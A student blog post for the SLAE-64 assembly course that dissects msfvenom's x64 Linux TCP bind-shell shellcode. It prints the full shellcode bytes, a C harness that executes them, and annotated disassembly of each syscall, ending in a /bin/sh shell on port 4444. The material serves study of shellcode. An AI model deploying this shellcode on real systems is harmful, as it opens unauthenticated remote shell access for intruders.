Tags: assembly, slae-64, shellcode
This post and two others make up the fifth of seven assignments for my attempt at the SecurityTube Linux Assembly Expert (SLAE-64) certification. The seven assignments vary in difficulty. I decided to take SLAE-64 to shore up my knowledge of assembly and shellcoding before diving into OSCE.
I started out by generating some shellcode samples. For my first selection, I decided to keep it simple by choosing a TCP bind shell, much like my first assignment. I hoped that this decision would point out areas of improvement in my own shellcode from which I could learn.
/*
* msfvenom -p linux/x64/shell_bind_tcp -f c
*
* No platform was selected, choosing Msf::Module::Platform::Linux from the payload
* No Arch selected, selecting Arch: x64 from the payload
* No encoder or badchars specified, outputting raw payload
* Payload size: 86 bytes
* Final size of c file: 386 bytes
*/
unsigned char buf[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";
The next step is to add the shellcode to a shellcode skeleton used for testing, then compile the resulting C code into an executable for analysis.
// gcc -fno-stack-protector -z execstack -o shellcode-skeleton shellcode-skeleton.c
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";
int main() {
// sizeof rather than strlen: this payload contains null bytes, so strlen would stop early
printf("Shellcode length: %zu\n", sizeof(code) - 1);
int (*ret)() = (int(*)())code;
ret();
}
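One thing to watch when measuring this particular payload: because it was generated without a bad-character list, it contains null bytes, so any strlen-based count stops at the first one. A minimal sketch of the difference follows; the helper names are mine and not part of the skeleton.

```c
#include <stddef.h>
#include <string.h>

/* Same 86-byte msfvenom payload as in the skeleton. */
static const unsigned char code[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";

/* Stops at the first 0x00 byte (inside the mov DWORD PTR [rsp] immediate). */
size_t length_by_strlen(void) {
    return strlen((const char *)code);
}

/* Counts every byte of the literal, minus the implicit string terminator. */
size_t length_by_sizeof(void) {
    return sizeof(code) - 1;
}
```

With this payload, the strlen variant reports 19 while the sizeof variant reports the full 86 bytes that msfvenom advertised.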
The *&code expression points to the unsigned char array named code in the shellcode skeleton we set up in the previous step.
0x0000555555755020 <+0>: push 0x29
0x0000555555755022 <+2>: pop rax
0x0000555555755023 <+3>: cdq
0x0000555555755024 <+4>: push 0x2
0x0000555555755026 <+6>: pop rdi
0x0000555555755027 <+7>: push 0x1
0x0000555555755029 <+9>: pop rsi
0x000055555575502a <+10>: syscall
0x000055555575502c <+12>: xchg rdi,rax
0x000055555575502e <+14>: push rdx
0x000055555575502f <+15>: mov DWORD PTR [rsp],0x5c110002
0x0000555555755036 <+22>: mov rsi,rsp
0x0000555555755039 <+25>: push 0x10
0x000055555575503b <+27>: pop rdx
0x000055555575503c <+28>: push 0x31
0x000055555575503e <+30>: pop rax
0x000055555575503f <+31>: syscall
0x0000555555755041 <+33>: push 0x32
0x0000555555755043 <+35>: pop rax
0x0000555555755044 <+36>: syscall
0x0000555555755046 <+38>: xor rsi,rsi
0x0000555555755049 <+41>: push 0x2b
0x000055555575504b <+43>: pop rax
0x000055555575504c <+44>: syscall
0x000055555575504e <+46>: xchg rdi,rax
0x0000555555755050 <+48>: push 0x3
0x0000555555755052 <+50>: pop rsi
0x0000555555755053 <+51>: dec rsi
0x0000555555755056 <+54>: push 0x21
0x0000555555755058 <+56>: pop rax
0x0000555555755059 <+57>: syscall
0x000055555575505b <+59>: jne 0x555555755053 <code+51>
0x000055555575505d <+61>: push 0x3b
0x000055555575505f <+63>: pop rax
0x0000555555755060 <+64>: cdq
0x0000555555755061 <+65>: movabs rbx,0x68732f6e69622f
0x000055555575506b <+75>: push rbx
0x000055555575506c <+76>: mov rdi,rsp
0x000055555575506f <+79>: push rdx
0x0000555555755070 <+80>: push rdi
0x0000555555755071 <+81>: mov rsi,rsp
0x0000555555755074 <+84>: syscall
0x0000555555755076 <+86>: add BYTE PTR [rax],al
The next breakpoint is set to the socket syscall located at 0x000055555575502a. There’s nothing really out of the ordinary here. The shellcode and register values are in line with what’s expected from previous looks at a bind shell.
push 0x29
pop rax ; socket syscall number into rax
cdq ; use sign extension to zero out rdx
push 0x2
pop rdi ; value 2 into rdi (AF_INET)
push 0x1
pop rsi ; value 1 into rsi (SOCK_STREAM)
syscall
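The cdq trick in the snippet above is worth spelling out, since it is a one-byte way to clear rdx. What follows is only a C model of the instruction's effect (the function name is hypothetical): cdq copies the sign bit of eax into every bit of edx, and any write to edx clears the upper half of rdx.

```c
#include <stdint.h>

/* Model of `cdq`: returns the value rdx would hold afterwards for a given eax. */
uint64_t rdx_after_cdq(uint32_t eax) {
    /* edx is filled with copies of eax's sign bit */
    uint32_t edx = (eax & 0x80000000u) ? 0xFFFFFFFFu : 0u;
    /* writing a 32-bit register zero-extends into the full 64-bit register */
    return (uint64_t)edx;
}
```

Since rax holds 0x29 at that point, the sign bit is clear and rdx ends up as zero, which doubles as the protocol argument to socket.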
The next breakpoint is set to the bind syscall located at 0x000055555575503f. There are a few things going on here that we’ll discuss. First, the assumption that rdx is still zero. All the information that I could find states that rdx is a caller-save register, meaning that it’s incumbent upon the caller to save the state of that register across procedure calls. That convention covers ordinary function calls, though. For the raw syscall instruction, the Linux kernel only clobbers rax, rcx, and r11, so the zero placed in rdx by cdq survives the socket call.
Second, msfvenom doesn’t care if null-bytes are present. If you tell the program that you’re concerned about nulls, it will then encode the shellcode to remove those null-bytes (or any other bad character you’re interested in suppressing). If you don’t specify bad characters, msfvenom just cranks out concise shellcode. It’s kind of refreshing that the mental gymnastics of removing nulls isn’t strictly necessary at all times.
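Finally, the shellcode here doesn’t care about zeroing out the entire 16 bytes needed for the sockaddr_in struct. The push rdx zeroes 8 bytes, and the following mov overwrites the first 4 of them with the family and port, which leaves the 4-byte address field at zero (INADDR_ANY). The trailing 8 bytes of padding are left as whatever happened to be on the stack. It doesn’t appear to carry any negative consequences, though.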
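To see how those stack writes line up with the struct, here is a rough C reconstruction. It assumes a little-endian host and the Linux layout of struct sockaddr_in; the function name and the 0xAA filler (standing in for stale stack bytes) are my own choices.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <string.h>

/* Rebuilds the 16 bytes that rsi points to at the time of the bind syscall. */
struct sockaddr_in sockaddr_from_stack(uint32_t dword) {
    unsigned char stack[sizeof(struct sockaddr_in)];
    struct sockaddr_in sa;

    memset(stack, 0xAA, sizeof stack);    /* stand-in for leftover stack contents */
    memset(stack, 0, 8);                  /* push rdx (rdx == 0): 8 zero bytes */
    memcpy(stack, &dword, sizeof dword);  /* mov DWORD PTR [rsp], dword */
    memcpy(&sa, stack, sizeof sa);        /* view the bytes as a sockaddr_in */
    return sa;
}
```

Feeding it 0x5c110002 yields a family of AF_INET (2), a port of 4444 (0x115c in network byte order), and an address of INADDR_ANY.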
xchg rdi,rax ; put socket's file descriptor into rdi
push rdx ; push 0x0 onto the stack
mov DWORD PTR [rsp],0x5c110002 ; move the port and AF_INET onto the stack
mov rsi,rsp ; rsi now points to sockaddr_in struct
push 0x10
pop rdx ; value 16 into rdx (length of sockaddr_in)
push 0x31
pop rax ; value 49 into rax (bind syscall #)
syscall
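The push rdx above only pushes zero if rdx made it through the socket syscall untouched. A small experiment along these lines can confirm that on x86-64 Linux. This is a sketch using GCC-style inline assembly; the function name is hypothetical, and getpid is used simply because it takes no arguments.

```c
#include <sys/syscall.h>

/* Issues a getpid syscall with a chosen value in rdx and returns rdx afterwards. */
unsigned long rdx_after_getpid(unsigned long rdx_in) {
    unsigned long rax = SYS_getpid;
    unsigned long rdx = rdx_in;

    __asm__ volatile ("syscall"
                      : "+a"(rax), "+d"(rdx)     /* rax: syscall number in, return value out */
                      :
                      : "rcx", "r11", "memory"); /* registers the syscall instruction clobbers */
    return rdx;
}
```

The value that comes back should match the value that went in, which is what lets the shellcode skip a second cdq before building the struct.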
The next breakpoint is set to the listen syscall located at 0x0000555555755044. The only surprising thing to me in this section was that msfvenom disregarded the backlog argument to the listen syscall (int listen(int sockfd, int backlog);). The value of rsi at the time of the syscall was still the memory address of the sockaddr_in struct that was used during the bind syscall. Because backlog is an int passed by value, the kernel never dereferences that pointer: it is the low 32 bits of the stack address itself, not the 0x5c110002 stored there, that end up as the backlog. Linux caps the backlog at net.core.somaxconn, so the oversized value does no harm.
push 0x32
pop rax ; value 50 into rax (listen syscall #)
syscall
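As a rough illustration of why the leftover pointer in rsi is harmless, here is a simplified model of how the backlog ends up being interpreted. It is only a sketch of the kernel's behavior as I understand it; the function name, the sample address, and the somaxconn value used below are all assumptions.

```c
#include <stdint.h>

/* Model: the int argument is the low 32 bits of rsi, compared as unsigned against the cap. */
int effective_backlog(uint64_t rsi, unsigned int somaxconn) {
    unsigned int backlog = (uint32_t)rsi;  /* upper 32 bits of the register are dropped */

    if (backlog > somaxconn)               /* unsigned comparison, so "negative" values are huge */
        backlog = somaxconn;
    return (int)backlog;
}
```

For a typical stack address such as 0x7fffffffe3a0 and a cap of 4096, the model returns 4096, while a small explicit backlog like 5 passes through unchanged.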
The next breakpoint is set to the accept syscall located at 0x000055555575504c. Another surprise to me here was that the generated shellcode zeroes out rsi, which would normally point to space for the peer’s sockaddr, and makes the call with no other setup. That works because accept allows a NULL addr, in which case nothing is written back and addrlen is not used. rdx still holds the value 16 from the call to bind, but since addrlen is a pointer argument and addr is NULL, that leftover value is simply ignored.
xor rsi,rsi
push 0x2b
pop rax ; value 43 into rax (accept syscall #)
syscall
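The same shortcut is available from C: when the peer address isn't needed, accept can be called with NULL for both addr and addrlen. The sketch below checks that on the loopback interface by connecting to its own listener; the function name is hypothetical, and it assumes loopback networking is available.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Returns 0 if accept(fd, NULL, NULL) hands back a usable descriptor, -1 otherwise. */
int accept_without_peer_addr(void) {
    struct sockaddr_in sa;
    socklen_t len = sizeof sa;
    int result = -1;
    int conn = -1;
    int srv = socket(AF_INET, SOCK_STREAM, 0);
    int cli = socket(AF_INET, SOCK_STREAM, 0);

    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = 0;                          /* let the kernel pick a free port */

    if (srv >= 0 && cli >= 0 &&
        bind(srv, (struct sockaddr *)&sa, sizeof sa) == 0 &&
        listen(srv, 1) == 0 &&
        getsockname(srv, (struct sockaddr *)&sa, &len) == 0 &&  /* learn the chosen port */
        connect(cli, (struct sockaddr *)&sa, sizeof sa) == 0) {
        conn = accept(srv, NULL, NULL);       /* no peer address requested */
        if (conn >= 0)
            result = 0;
    }

    if (conn >= 0) close(conn);
    if (cli >= 0) close(cli);
    if (srv >= 0) close(srv);
    return result;
}
```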
The next breakpoint is set to the dup2 loop’s comparison located at 0x000055555575505b. As expected, there is a tight loop that counts down from 2 to 0, calling dup2 each time until STD{IN,OUT,ERR} are all duplicated.
0x000055555575504e <+46>: xchg rdi,rax ; accept returns client to rax, store it back in rdi
0x0000555555755050 <+48>: push 0x3
0x0000555555755052 <+50>: pop rsi ; loop counter in rsi
0x0000555555755053 <+51>: dec rsi ; 2 -> 1 -> 0
0x0000555555755056 <+54>: push 0x21
0x0000555555755058 <+56>: pop rax ; value 33 into rax (dup2 syscall)
0x0000555555755059 <+57>: syscall
0x000055555575505b <+59>: jne 0x555555755053 <code+51>
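The loop above has no explicit cmp: the jne reuses the zero flag left by dec rsi, since push and pop don't touch the flags and the kernel restores them when the syscall returns. A C model of the control flow might look like this; the function name is mine, and it records the target descriptors instead of actually calling dup2.

```c
#include <stddef.h>

/* Records, in order, the second argument each dup2 call in the loop would receive. */
size_t dup2_targets(int out[], size_t cap) {
    size_t n = 0;
    long rsi = 3;                 /* push 0x3 / pop rsi */

    do {
        rsi--;                    /* dec rsi: sets ZF once rsi reaches 0 */
        if (n < cap)
            out[n++] = (int)rsi;  /* the shellcode calls dup2(client_fd, rsi) here */
    } while (rsi != 0);           /* jne: loop again while ZF is clear */

    return n;
}
```

Starting the counter at 3 and decrementing before the call is what produces the 2, 1, 0 sequence with the final iteration falling through to execve.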
The final breakpoint is set to the execve syscall located at 0x0000555555755074. The generated execve shellcode aligns closely with what is covered as part of the SLAE-64 course. Nothing too out of the ordinary in this section.
0x000055555575505d <+61>: push 0x3b
0x000055555575505f <+63>: pop rax ; value 59 into rax (execve syscall)
0x0000555555755060 <+64>: cdq ; zero out rdx via sign extension
0x0000555555755061 <+65>: movabs rbx,0x68732f6e69622f
0x000055555575506b <+75>: push rbx ; get /bin/sh on stack
0x000055555575506c <+76>: mov rdi,rsp ; address to /bin/sh in rdi
0x000055555575506f <+79>: push rdx ; push null
0x0000555555755070 <+80>: push rdi ; push addr of /bin/sh
0x0000555555755071 <+81>: mov rsi,rsp ; pointer to addr of /bin/sh in rsi
0x0000555555755074 <+84>: syscall
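The movabs immediate above is just the string /bin/sh packed into a single register. Decoding it in C makes that easier to see. This sketch assumes a little-endian host, and the helper name is hypothetical.

```c
#include <stdint.h>
#include <string.h>

/* Copies the 8 bytes of a 64-bit immediate into a buffer as they would sit in memory. */
void qword_to_string(uint64_t imm, char out[9]) {
    memcpy(out, &imm, 8);  /* little-endian: lowest byte comes first */
    out[8] = '\0';         /* defensive terminator for immediates with no zero byte */
}
```

Passing 0x68732f6e69622f gives back "/bin/sh". The unused top byte of the immediate is zero, so the string is already null-terminated once rbx is pushed, at the cost of a null byte in the payload itself.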
My main takeaway from this analysis is that reducing the number of opcodes is not the last step to producing small shellcode. The first step should be to write something that works, without any regard to size or bad characters. After that, ways of producing smaller opcodes can be applied. Up until performing this analysis, this is where my process stopped. As a third step, I plan to step through the shellcode again with an eye to where I can make use of existing values in registers to satisfy the requirements of the calls my shellcode is trying to make.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert
Student ID: E64-1584
My SLAE-64 Assignments Repository